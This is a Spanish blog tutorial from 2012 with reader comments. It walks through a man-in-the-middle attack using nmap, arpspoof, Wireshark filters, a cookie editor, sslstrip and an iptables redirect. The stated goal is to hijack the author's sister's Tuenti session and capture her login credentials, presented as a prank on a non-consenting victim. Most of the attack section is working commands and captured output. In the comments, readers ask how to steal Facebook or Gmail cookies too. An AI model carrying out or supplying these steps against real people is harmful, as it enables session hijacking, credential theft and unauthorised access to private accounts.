man-in-the-middle con arpspoof, sslstrip, wireshark y mucho tiempo libre

BlogAcerca de

« ¡Ay, que yo también quiero una Raspberry Pi!Man-in-the-middle con arpspoof, sslstrip, Wireshark y mucho tiempo libre (epílogo) »

Man-in-the-middle con arpspoof, sslstrip, Wireshark y muchotiempo libre

Publicado 02/03/2012 Notas mentales 6 ComentariosEtiquetas: arpspoof, jeik jeik, man in the middle, mitm, sslstrip, tuenti

HOLA HOLA.

Hoy, queridos amigos, vamos a aprender a hacer un man-in-the-middle (de aquí enadelante, MITM) usando arpspoof, sslstrip, Wireshark, y algunas otras cositas más.Las instrucciones las haré a la medida de Arch Linux, pero como sois más listos que lamar, no os costará nada de nada hacer lo mismito en otras distros o incluso en otrossistemas operativos. Sí señor.

El objetivo: cazar la sesión y, posteriormente, la cookie del perfil en Tuenti de nuestrahermanita, la cual nos cae mal porque… no sé, eso ya es cosa vuestra.

Antes de nada, reuniremos los ingredientes:

arpspoof. Esto está en el paquete dsniff.1.sslstrip. Hay un PKGBUILD en el AUR.2.Wireshark. Instala wireshark-gtk, luego añádete al grupo wireshark usandousermod -a -G wireshark usuario, y cierra todas las sesiones que tengas abiertaspara que los cambios tengan efecto.

3.

Firefox con su complemento Cookies Manager+.4.iptables.5.nmap. Si nos sabemos la IP de la ingenua víctima no nos va a hacer ni falta, perosupongamos que la tenemos que adivinar.

6.

Bueno, ya está bien de instalar tonterías. Al meollo.

Nuestra inquieta hermanita es un dolor de huevos importante, y hemos decididogastarle una bromita inocente: le vamos a cambiar el estado del Tuenti. Podríamos ira su ordenador y cambiárselo directamente, pero como es una yonki, no hay quien lasepare de ahí, por lo que lo habremos de hacer remotamente.

Son las tres y media; ya ha vuelto de clase, ya ha comido. Se ha sentado frente a suordenador. Ay, qué nervios. Lo que nos vamos a reír. ¿A que sí?

Supondremos que no sabemos la IP que tiene el PC de nuestra hermanita. Si fuimosnosotros los que lo configuramos en su día, o tenemos acceso al router y dicho PC usa

Man-in-the-middle con arpspoof, sslstrip, Wireshark y m... https://thacid.wordpress.com/2012/03/02/man-in-the-mid...

1 de 10 16/04/13 01:50

DHCP (¿quién no es admin de su propia red?), ya tenemos la IP. Pero vamos aimaginar que no. En esta vida hay que ponerse en lo peor.

Abrimos una terminal, nos hacemos root y, suponiendo que nuestra red de área local(ay, qué pedante) esté en 192.168.0.*, ponemos:

# nmap 192.168.0.0/24 -sP

Vale. ¿Y ahora? Pues aquí están los resultados:

Starting Nmap 5.51 ( http://nmap.org ) at 2012-03-02 12:29 CETNmap scan report for 192.168.0.1Host is up (0.0014s latency).MAC Address: 00:03:6F:CA:03:A1 (Telsey SPA)Nmap scan report for 192.168.0.2Host is up.Nmap scan report for 192.168.0.3Host is up (0.0018s latency).MAC Address: E4:7C:F9:DE:81:1F (Samsung Electronics Co.)Nmap done: 256 IP addresses (3 hosts up) scanned in 6.91 seconds

Ahí, ahí, bien. Vemos tres direcciones IP despiertas:

192.168.0.1, que obviamente es el router.1.192.168.0.2, que somos nosotros (en este caso, prueba de ello es que no nossale la MAC, pero esto depende de otros factores).

2.

192.168.0.3, que es nuestra hermanita.3.

Bueno, y ahora qué hacemos, diréis.

Cuando nuestra terrible hermanita genera tráfico, éste va directamente desde suordenador al router y, de ahí, a la WAN Internet. Nuestro objetivo es colocarnos enmedio de ella y del router para poder controlar lo que hace: no sólo podremos verlotodo, sino que además ¡podremos modificarlo!

Sacaremos el arpspoof. Ésta es una herramienta sencilla: sólo requiere la IP de lavíctima (nuestra hermanita) y la IP del router (…el router). Antes necesitamos ciertospreparativos. Para hacer que el tráfico fluya por nuestro ordenador, debemosexplicárselo al kernel educadamente:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Vale. Por otro lado, ¿tienes reglas de iptables puestas? De ser así, quítalas; nospueden dar problemas.

Ahora sí, arpspoof al ataque.

ESPERA ESPERA ESPERA. Antes, abre Wireshark.


2 de 10 16/04/13 01:50

Pincha en la interfaz que vayas a usar (en mi caso, wlan0). Ya estás capturando, peroaún no hemos hecho el arpspoof, por lo que sólo ves lo que haces tú. Si miras en laparte superior de Wireshark, una de las barras de herramientas reza «Filter». Ahíescribiremos un filtro para no liarnos con lo que hace nuestro ordenador; sóloqueremos ver lo que hace el de nuestra hermanita. Además, sólo nos interesan laspeticiones HTTP. He aquí lo que habremos de poner:

(ip.src == 192.168.0.3 || ip.dst == 192.168.0.3) && http.request

O sea:

Hacemos clic en «Apply» y ya no deberíamos ver nada. Hasta ahora, todo bien. Ahoraes cuando podemos empezar con el arpspoof. Escribimos en una terminal de root:

# arpspoof -i wlan0 -t 192.168.0.3 192.168.0.1

Obviamente, la primera es la IP de nuestra hermanita y la segunda es la del router.

YA, YA. Ahora nos vamos a Wireshark. Buf, buf. Ya empezamos a ver cositas, eh. Nosvamos a una petición de Tuenti (la que sea, de éstas que empiezan con GET o POST),hacemos clic y, en el panel de abajo, abrimos «Hypertext Transfer Protocol».

Nos sale la lista de parámetros de la petición, entre ellos Cookie. Bingo, esto es lo quequeremos. Hacemos clic derecho en Cookie, Copy, Bytes, Printable Text Only.


3 de 10 16/04/13 01:50

Tenemos la cookie, tíos. LA TENEMOS. Nos falta ver qué hacemos con ella. Bueno, loprimero va a ser abrir un editor de texto y pegarla ahí.

Cookie: sid=lQBJBAAAAADo2zzghWuEuoXvA4Ro2eckJSrcOOuuUE8;lang=es_ES; pid=0b3c7aff; co16sx3p=1;__utma=81029266.1859165469.1330689298.1330689298.1330689298.1;__utmb=81029266.1.10.1330689298; __utmc=81029266;__utmz=81029266.1330689298.1.1.utmcsr=tuenti.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Como ves, es una lista de parámetros. El único que realmente queremos es sid.Cópialo al portapapeles.

Ahora vete al Firefox y abre Tuenti. Si tenías tu sesión abierta, ciérrala. Abre elCookies Manager+ y, en el cuadro de búsqueda, pones tuenti. Te dará unos cuantosresultados que, sin duda alguna, diferirán de éstos:

Ahora haz doble clic en, por ejemplo, pid:


4 de 10 16/04/13 01:50

Cambia pid por sid y el contenido de la cookie por el contenido de sid que ya cogimosantes:

Pincha en «Save as new» y cierra el Cookies Manager+. Sigues en la página de iniciode sesión de Tuenti, ¿no? Pues pulsa F5.

Ay, ay, ay que me da.

Lo hemos conseguido. Podemos oír esto de fondo. Qué ilusión, joder. Somos dioses.

Espera, que no. ¿Y si cierra sesión? Pues ya no podremos usar esa cookie más,queda invalidada. ¿Qué hacemos?

Pues para eso un señor muy amable y muy bueno inventó sslstrip. Hagámoslofuncionar. Nos vamos a una terminal de root y arrancamos sslstrip:

# sslstrip

sslstrip 0.9 by Moxie Marlinspike running…

Muy bien. Y ahora tenemos que poner una regla de iptables para redirigir todo lo queva por el puerto 80 hacia el 10000, que es donde sslstrip escucha:

# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT–to-port 10000

Ya está. Así de primeras no hemos notado nada, pero mira, vámonos a Tuenti (al denuestra hermanita, que no lo hemos cerrado aún) y le cerramos la sesión.


5 de 10 16/04/13 01:50

Como es natural, si se le cierra la sesión de repente lo va a notar, pero bueno, anosotros no es que nos importe mucho. Volvemos a la pantalla de inicio de sesión.Tierra cero.

Nuestra hermanita hará clic en cualquier enlace de dentro de Tuenti y tambiénvolverá al inicio de sesión. Y entonces mirará extrañada y procederá a iniciar sesiónmetiendo sus datos. El resto ya os lo imagináis.

sslstrip modifica al vuelo la página que nuestra hermanita ve; normalmente ellainiciaría sesión usando HTTPS, pero sslstrip cambia, en el formulario de inicio desesión:

<form id=”form_login” action=”https://secure.tuenti.com/?m=Login&func=do_login” method=”post” …

Por:

<form id=”form_login” action=”http://secure.tuenti.com/?m=Login&func=do_login” method=”post” …

Ni el mejor detective descubriría el trabajito.

Para simplificar las cosas, vamos a cambiar el filtro de Wireshark por:

(ip.src == 192.168.0.3 || ip.dst == 192.168.0.3) && http.request.method== “POST”

Así sólo veremos las peticiones POST (como la que hay que hacer para iniciar sesión),y, voilà:


6 de 10 16/04/13 01:50

Y el resto ya es cosa vuestra. Don’t be evil…

Atención: hay una segunda parte de este post con más información.

Me gusta:

Me gusta Cargando...

6 Respuestas a “Man-in-the-middle con arpspoof, sslstrip, Wireshark y muchotiempo libre”

Feed para esta Entrada Dirección de Trackback

1 TuMalaCon100cia 02/03/2012 en 16:27

Buff, estoy en ello, ya lo he leido una vez, ahora queda releerlo y ponerlo enmarcha. Te agradezco mucho este pedazo de articulo, si tengo algun problemacon algun comando te lo haré saber. Gracias.

Responder

1.

2 susaniita 26/03/2012 en 22:59

enhorabuena, muy educativo a la vez de ameno pues la historia de tu hermanitame tenia intrigadisimaaaa, sabrias tambien decirme cual es la cookie que hayque captar en el facebook or gmail o hotmail de tu queridisima hermanita¿gracias

Responder

3 wodim 26/03/2012 en 23:13

Lee la segunda parte: http://thacid.wordpress.com/2012/03/03/man-in-the-middle-con-arpspoof-sslstrip-wireshark-y-mucho-tiempo-libre-epilogo/

Responder

2.

4 simonmarley1 03/06/2012 en 18:35

perdona no me va este comando y lo he puesto por lo menos 20 veces..haber sime puedes ayudar..gracias

3.


7 de 10 16/04/13 01:50

Responder

5 Daniel 10/07/2012 en 5:51

Muy bueno funciona al 100

Responder

4.

1 Man-in-the-middle con arpspoof, sslstrip, Wireshark y mucho tiempo libre(epílogo) « Thacid Trackback en 03/03/2012 en 12:06

1.

Deja un comentario

Añade tu comentario aquí...

Introduce tus datos o haz clic en un icono para iniciar sesión:

Correo electrónico (requerido) (La dirección no se hará pública)

Nombre (requerido)

Web

Estás comentando usando tu cuenta de WordPress.com. ( Log Out / Cambiar )

Estás comentando usando tu cuenta de Twitter. ( Log Out / Cambiar )


8 de 10 16/04/13 01:50

Estás comentando usando tu cuenta de Facebook. ( Log Out / Cambiar )

Cancelar

Connecting to %s

Recibir siguientes comentarios por correo.

Recibir nuevas entradas por email.

Publicar comentario

« ¡Ay, que yo también quiero una Raspberry Pi!Man-in-the-middle con arpspoof, sslstrip, Wireshark y mucho tiempo libre (epílogo) »

buscar go

Sobre mí

Mi TwitterMi Last.fm

Entradas recientes

Installing fearqdb on Debian + lighttpd in 10 stepsRewrite rules for SMF Pretty URLs on LighttpdMemetro y sus consecuenciasMinecraft en Arch LinuxBalance CyanogenMódico en el LG E510 Optimus Hub

Tema K2-lite por k2 team. Blog de WordPress.com.Entradas RSS y Comentarios RSS

Seguir

Follow “Thacid”

Recibe cada nueva publicación en tu buzón de correo electrónico.

Introduce tu dirección de correo electrónico


9 de 10 16/04/13 01:50

Sign me up

Ofrecido por WordPress.com%d bloggers like this:


10 de 10 16/04/13 01:50

man-in-the-middle con arpspoof, sslstrip, wireshark y mucho tiempo libre

Documents